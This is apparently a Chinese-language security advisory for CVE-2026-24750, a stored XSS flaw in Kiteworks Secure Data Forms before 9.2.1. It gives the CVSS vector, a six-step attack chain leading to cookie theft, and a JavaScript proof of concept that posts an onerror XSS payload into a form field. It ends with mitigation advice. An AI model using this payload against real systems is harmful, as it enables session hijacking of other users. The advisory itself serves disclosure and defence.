IPBUF安全漏洞报告
English
CVE-2026-24750 CVSS 7.6 高危

CVE-2026-24750 Kiteworks存储型XSS漏洞

披露日期: 2026-03-25

漏洞信息

漏洞编号
CVE-2026-24750
漏洞类型
存储型XSS
CVSS评分
7.6 高危
攻击向量
网络 (AV:N)
认证要求
低权限 (PR:L)
用户交互
需要交互 (UI:R)
影响产品
Kiteworks Secure Data Forms

相关标签

XSSStored XSSKiteworksCVE-2026-24750Web安全

漏洞概述

Kiteworks Secure Data Forms在9.2.1之前的版本中存在严重的存储型跨站脚本(XSS)漏洞。由于应用程序在网页生成过程中未能正确中和用户输入,经过身份验证的攻击者可以通过修改表单字段注入恶意JavaScript代码。该恶意脚本会被持久化存储在服务器端,当其他用户(尤其是管理员)查看或编辑该表单时,脚本将在其浏览器上下文中执行。攻击者利用此漏洞可窃取用户会话Cookie、执行未授权操作或重定向用户至恶意站点,对系统的机密性和完整性构成威胁。

技术细节

该漏洞属于典型的存储型跨站脚本攻击(Stored XSS),其技术原理在于应用程序缺乏对用户输入的严格输出编码。攻击者首先需要具备低权限账户(PR:L),通过Kiteworks的表单修改接口提交包含恶意脚本的Payload(如<script>标签或事件处理器)。系统在未经过滤的情况下将数据存入数据库。由于攻击发生在服务器端且数据持久化,该漏洞的影响范围较大。当其他用户(UI:R)访问受污染的表单页面时,服务器会返回包含恶意代码的HTML文档,浏览器解析并执行该代码。根据CVSS向量(AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:L),成功利用此漏洞可导致高机密性影响(如数据窃取)和高完整性影响(如数据篡改),尽管可用性影响相对较低,但在组合攻击中可能作为跳板进一步渗透内网。

攻击链分析

STEP 1
1. 获取凭证
攻击者注册或获取一个低权限的Kiteworks账户。
STEP 2
2. 识别注入点
攻击者分析表单修改功能,确定未经过滤的输入字段。
STEP 3
3. 注入Payload
攻击者在表单字段中插入恶意JavaScript代码并提交修改。
STEP 4
4. 持久化存储
服务器将包含恶意代码的数据存储在数据库中。
STEP 5
5. 触发漏洞
受害者(如管理员)访问并渲染该受感染的表单页面。
STEP 6
6. 执行攻击
受害者的浏览器执行恶意脚本,导致Cookie泄露或会话劫持。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
// Proof of Concept for CVE-2026-24750 // This script demonstrates how an authenticated attacker might inject a payload. // Replace 'TARGET_URL' and 'COOKIES' with valid values. const TARGET_URL = 'https://target-kiteworks.com/api/forms/modify'; const PAYLOAD = '<img src=x onerror=alert(document.cookie)>'; // Simulate a request to modify a form field fetch(TARGET_URL, { method: 'POST', headers: { 'Content-Type': 'application/json', 'Cookie': 'session_id=attacker_session_token_here' }, body: JSON.stringify({ form_id: 12345, field_name: 'description', field_value: PAYLOAD // Malicious injection }) }).then(response => { if (response.ok) { console.log('[+] Payload injected successfully. Check the form view.'); } else { console.log('[-] Injection failed.'); } });

影响范围

Kiteworks Secure Data Forms < 9.2.1

防御指南

临时缓解措施
在升级补丁前,建议管理员限制普通用户对表单修改功能的访问权限,并加强对表单数据的输入过滤和验证。同时,用户应避免点击来源不明的链接或访问可疑的表单页面,以降低被攻击风险。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表